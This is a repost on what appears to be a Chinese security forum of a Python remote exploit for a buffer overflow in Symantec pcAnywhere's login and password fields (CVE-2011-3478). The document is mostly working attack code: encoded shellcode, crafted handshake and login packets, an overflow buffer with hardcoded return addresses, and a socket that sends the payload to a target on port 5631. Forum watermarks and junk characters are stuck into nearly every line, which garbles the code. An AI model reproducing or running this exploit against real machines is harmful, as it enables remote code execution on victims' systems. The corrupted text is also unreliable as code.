Symantec pcAnywhere可登录名和密码字段缓冲区溢出
2012-07-05 00:01:59   来源：http://www.exploit-db.com/exploits/19407/   评论：0 点击：

#!/usr/bin/python90sec# E( n6 M$ ]% J* U8 B

7 {; `# J& H  R. n) p; b7 \90sec# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
' F* y  t5 |/ O5 [90sec# Date: 2012.06.27
! R+ @( g6 d/ ?9 @90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。# Author: S2 Crew [Hungary]
. t: f& S! A; h2 s4 H - 专注信息安全# Software Link: symantec.com
+ C' @+ S. S" M' d& ]) Z - 专注信息安全# Version: 12.5.0
$ S7 B7 b8 h/ o: S7 ~- S90 Security Team# Tested on: Windows XP SP290 Security Team' i, Q8 M- x7 ^3 W6 J
# CVE: CVE-2011-3478
( w$ a7 x8 u# q; `$ s  F2 s - 专注信息安全   - 专注信息安全2 C' @! r: A7 w/ H* E+ r! U* O/ B! ~
# Code :
) W5 [/ l7 P3 ~. N6 k! [4 d90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。import socketwww.90sec.org0 @1 G8 b! O4 X# A, P
import time! h" \5 S3 G0 g. q
import struct
5 ~: ~+ z1 r. D, f$ s90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。import string
9 J' x1 ~) ^% H/ y) ?90secimport sys
# }& S. B  ]. Z* h90 Security Team
9 c) K' S- w0 c( j90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。shell = (( x/ `+ ~7 o$ ]' U/ [8 x, g: h4 R
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9" - 专注信息安全3 w3 G) V/ [3 P8 o- j2 r+ w
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"4 D8 y; r" O$ g) P% C
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。9 h* j8 V% Q( C# J3 \5 n5 z) ~
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"90sec9 |0 M. B, S  M; m# J
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48" - 专注信息安全5 S- R& z- {+ I( x7 |7 U$ n* g
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2"
8 g/ x/ e  V7 U/ {% s90 Security Team"\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5"90sec- b$ z$ o, k- J" f2 b5 X4 o1 H7 z
"\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb"
4 D$ T. ]9 _+ @: |( \, |"\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b"
4 v) R+ g! M% l, ?90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。"\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3"www.90sec.org$ _5 J! f$ x) b9 w7 i
"\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74"
4 I5 i8 A. r) R: Y" k1 T# y; ^/ e1 ["\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7"90 Security Team; w! M3 F) w3 b! D
"\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34"
# V! `6 y, _7 i) E& h, p: k  @" p" ^"\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b"
3 |" ^% u9 I1 b, P. B3 w90sec"\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0"
- X" Y7 |2 a( M0 dwww.90sec.org"\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8"
" ?0 \0 b, H" T6 Y2 f9 W - 专注信息安全"\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04"90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。: i( ^& |( W1 i! P1 P5 {1 x) |
"\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44"www.90sec.org, P  Y0 T3 [% Z4 F  O. p( A' l
"\xa3\xbc\xd9\x0f\x37\xaf\xdd\x2e\x48\xfa\x75\x38\x71\x6d"90 Security Team. l8 U, u$ o4 I! }" k6 i
"\x0f\x54\x30\x0f\x10\x7d\xa2\xac\x83\x1a\x32\xba\xbf\xb4"
% g! V2 |% C" c2 k- x* z& `( B - 专注信息安全"\x65\xeb\x0e\xcd\xe3\x01\x28\x67\x11\xd8\xac\x40\x91\x07"
9 B. T# k# h  V* a2 W) w0 K90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。"\x0d\x4e\x18\xc5\x29\x74\x0a\x13\xb1\x30\x7e\xcb\xe4\xee"
# j" N) ~1 E3 Y( ]# m" V  F* T2 M"\x28\xad\x5e\x41\x82\x67\x0c\x0b\x42\xf1\x7e\x8c\x14\xfe"
* n, M. q  o" u: j: v: d: Y% N$ O90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。"\xaa\x7a\xf8\x4f\x03\x3b\x07\x7f\xc3\xcb\x70\x9d\x73\x33"
; G8 _9 Y* ~% t0 Q( x2 k# \' n90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。"\xab\x25\x83\x7e\xf1\x0c\x0c\x27\x60\x0d\x51\xd8\x5f\x52"www.90sec.org( {' K+ f& d4 }7 R
"\x6c\x5b\x55\x2b\x8b\x43\x1c\x2e\xd7\xc3\xcd\x42\x48\xa6"90sec. n5 e8 A) B! O$ @" h
"\xf1\xf1\x69\xe3"* J7 d, U* v/ v: c
)90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。# A" p0 T/ \3 T* I1 H4 U$ o
init1 = (* V7 H+ Y% S0 _+ ]
"\x00\x00\x00\x00" # kezdeti handshake
3 J' k6 ?! _6 {/ j( x9 Q& Fwww.90sec.org)90 Security Team/ Q. e9 R: W. J0 W. a

4 T$ a( x  I# u0 t& z: B5 [# finit2 = (" z, ?. E$ U' H- T% ~8 `0 ?
"\x0d\x06\xfe" # Enter username uzenet koveti (NTdialog)
2 U3 Z! H* w4 x) P0 G6 ~9 C2 b90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。)
" w# s5 z! W" _9 X1 f! v) v90sec
/ p$ a" g+ @" Q' h) E; B3 d7 L90secinit3 = (
3 Y( f0 `  v( \4 Q90 Security Team"A" * 100 #+ "\r" #usernamewww.90sec.org3 D9 A0 ]- g$ I
)90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。8 x7 `8 @8 R4 G% u* f; N, ]  \" y
90 Security Team! W: N% @% q9 d# F8 f( S8 P
readable_xp_sp2 = struct.pack('<L',0x023E5AD0)
- ~8 P4 F( M8 X* d7 Ocall_esi = struct.pack('<L',0x67f7aac4) - 专注信息安全! y. i( e* D; O  t( B) n
jmp = struct.pack('<L',0x414112EB)www.90sec.org, A- r; m- P4 J) r* m9 y

! K7 T- x. Q5 u, E# Vinit4 = (
& g( D. b$ w  r+ _* k3 Nwww.90sec.org"B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell))
5 v- q0 I2 N& Z) s: r - 专注信息安全)
* p: a" Q4 O' c" i% V5 C" E90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。 90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。* m) t. M2 E# m. t% Q
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 m1 K- o+ P' F7 r- [+ S2 J90secconnect=s.connect(('172.16.29.133',5631)) # hardcoded IP address
' Y6 s8 q2 o* a: K5 a90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。 - 专注信息安全. v0 h" M4 o  W3 Z
print "init packet..."90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。7 _1 A  ?5 r8 {# R. P2 r) O
s.send(init1) # send the data90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。) h. ~' J* \( A+ @7 m4 R
time.sleep(5)
4 G% I% o, Y1 h9 j90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。data = s.recv(1024)6 [. d- w5 Z3 o% u- z
90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。3 N$ l. V% m$ }5 g
print "handshake packet..."90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。- e4 h  b0 w! C$ K% ?
s.send(init2) # send the data
& V5 W( Q: O/ v' r  @; g" R% a6 j0 ?90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。time.sleep(5)
  O% n. p( C+ @/ {1 @, g90 Security Teamdata = s.recv(1024)
/ r' k3 i9 @9 y$ v+ Y7 \7 k; L90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。 90 Security Team' m; ?6 }3 b$ e+ A$ \
print "username packet..."
4 [" Q/ j3 i( B90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。s.send(init3) # send the data
5 s! v) ^. O$ `2 xwww.90sec.orgtime.sleep(5)
; S4 E5 G; o8 V1 x90sec#data = s.recv(1024)
, p5 w8 k  ]  e) t( ^, H) c: X90sec-国内后起的信息安全论坛之一,专注web安全,软件安全,无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。 - 专注信息安全; c3 _) S* f7 u& ?% M
print "password packet..."
$ t  ~8 p" I% g; N, z90secs.send(init4) # send the data
7 S7 C- u, m  P90 Security Teams.close()
# q# E. S: N: j90sec